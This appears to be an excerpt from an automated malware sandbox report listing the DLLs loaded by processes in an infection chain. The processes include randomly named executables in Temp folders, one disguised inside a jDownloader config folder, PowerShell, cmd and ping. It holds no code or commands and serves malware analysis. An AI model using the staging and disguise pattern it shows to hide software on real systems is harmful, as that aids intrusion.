Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Section loaded: feclient.dll
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Section loaded: advpack.dll
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: winmm.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: winmmbase.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: mmdevapi.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: ksuser.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: avrt.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: audioses.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: powrprof.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: umpdc.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: msacm32.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: midimap.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: dwrite.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Section loaded: ondemandconnroutehelper.dll
